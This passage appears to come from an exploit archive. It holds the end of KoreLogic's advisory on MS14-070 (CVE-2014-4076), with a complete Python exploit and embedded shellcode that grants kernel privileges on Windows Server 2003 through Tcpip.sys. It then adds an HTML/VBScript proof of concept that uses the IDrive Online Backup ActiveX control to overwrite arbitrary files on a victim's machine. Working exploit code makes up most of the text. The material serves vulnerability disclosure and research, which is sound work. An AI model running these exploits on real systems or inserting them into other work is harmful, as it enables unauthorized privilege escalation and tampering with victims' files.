to November.
2014.11.03 - Microsoft confirms the patch will ship in November.
2014.11.11 - Vulnerability publicly disclosed by Microsoft as
issue MS14-070 with CVE-2014-4076.
2015.01.28 - KoreLogic releases advisory.
7. Exploit
"""
#!/usr/bin/python2
#
# KL-001-2015-001 / MS14-070 / CVE-2014-4076
# Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation
# Matt Bergin @ KoreLogic / Level @ Smash the Stack
# shout out to bla
#
from optparse import OptionParser
from subprocess import Popen
from os.path import exists
from struct import pack
from time import sleep
from ctypes import *
from sys import exit
CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory =
windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory
DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
def spawn_process(path):
process = Popen([path],shell=True)
pid = process.pid
return
def main():
print "CVE-2014-4076 x86 exploit, Level\n"
global pid, process
parser = OptionParser()
parser.add_option("--path",dest="path",help="path of process to start and elevate")
parser.add_option("--pid",dest="pid",help="pid of running process to elevate")
o,a = parser.parse_args()
if (o.path == None and o.pid == None):
print "[!] no path or pid set"
exit(1)
else:
if (o.path != None):
if (exists(o.path) != True):
print "[!] path does not exist"
exit(1)
else:
Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start()
if (o.pid != None):
try:
pid = int(o.pid)
except:
print "[!] could not convert PID to an interger."
exit(1)
while True:
if ("pid" not in globals()):
sleep(1)
else:
print "[+] caught attacker cmd at %s, elevating now" % (pid)
break
buf =
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
sc =
"\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"
sc = sc.replace("\x41\x41\x41\x41",pack('<L',pid))
sc = sc.replace("\x11\x11\x11\x11","\x39\xff\xa2\xba")
sc = sc.replace("\x22\x22\x22\x22","\x00\x00\x00\x00")
handle = CreateFileA("\\\\.\\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[!] could not open handle into the Tcp device"
exit(1)
print "[+] allocating memory"
ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40)
if (ret_one != 0):
print "[!] could not allocate memory..."
exit(1)
print "[+] writing relevant memory..."
ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0)))
ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0)))
ret_four = WriteProcessMemory(-1, 0x1100, buf, len(buf), byref(c_int(0)))
ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0)))
ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0)))
print "[+] attack setup done, crane kick!"
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0)
CloseHandle(handle)
exit(0)
if __name__=="__main__":
main()
"""
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
"""

25
platforms/windows/remote/35928.html Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/48582/info
Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.
An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected.
<html>
<object classid=&#039;clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E&#039; id=&#039;target&#039; /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = &#039;vbscript&#039;>
Sub Boom()
arg1="FilePath\File_name_to_rewrite_or_create"
arg2=1
arg3="New_File_Content"
target.Text=arg3
target.SelStart=0
target.SelEnd=Len(arg3)
target.SaveToFIle arg1,arg2
End Sub
</script>
</html>